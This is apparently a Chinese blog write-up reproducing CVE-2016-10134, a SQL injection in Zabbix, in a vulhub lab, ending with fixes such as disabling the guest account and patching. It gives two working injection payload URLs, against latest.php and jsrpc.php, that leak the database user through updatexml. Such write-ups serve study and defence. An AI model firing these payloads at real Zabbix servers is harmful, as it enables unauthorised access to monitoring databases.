最近也是遇見了Zabbix,所以這里以CVE-2016-10134為例復現一下該漏洞
什么是Zabbix?
zabbix是一個基於WEB界面的提供分布式系統監視以及網絡監視功能的企業級的開源解決方案。zabbix能監視各種網絡參數,保證服務器系統的安全運營;並提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。
zabbix由2部分構成,zabbix server與可選組件zabbix agent。zabbix server可以通過SNMP,zabbix agent,ping,端口監視等方法提供對遠程服務器/網絡狀態的監視,數據收集等功能,它可以運行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。
漏洞復現
我們這里是用vulhub這個靶場生成的Zabbix這個漏洞環境
大概的登錄界面就是這樣子
有兩個頁面分別存在注入,我們來分開驗證一下
1. latest.php
(1)這個前提需要登入進去,比如未關閉Guest等。
攻擊機已知靶機ip,且靶機系統未關閉默認開啟guest賬戶登陸
訪問http://xx.xx.xx.xx:8080,用賬號guest(密碼為空)登錄游客賬戶
(2)這個需要把cookie中的zbx_sessionid后16值拿出來,當作下面payload中sid值,然后進行注入。(這里的sid是登錄界面的zbx_sessionid)
(3)payload:http://ip:port/latest.php?output=ajax&sid=d069aac010102217&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
說明此頁面存在sql注入
2. jsrpc.php
漏洞產生原因:profileIdx2 參數沒有被過濾
利用條件:guest用戶開啟,允許訪問
影響版本:2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3
通過這個無需登入
payload:http://ip:port/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
漏洞修復:
1.禁用Guest賬戶,關閉無用賬戶。
2.打補丁,升級zabbix版本。
參考:https://www.jianshu.com/p/40a0e8238878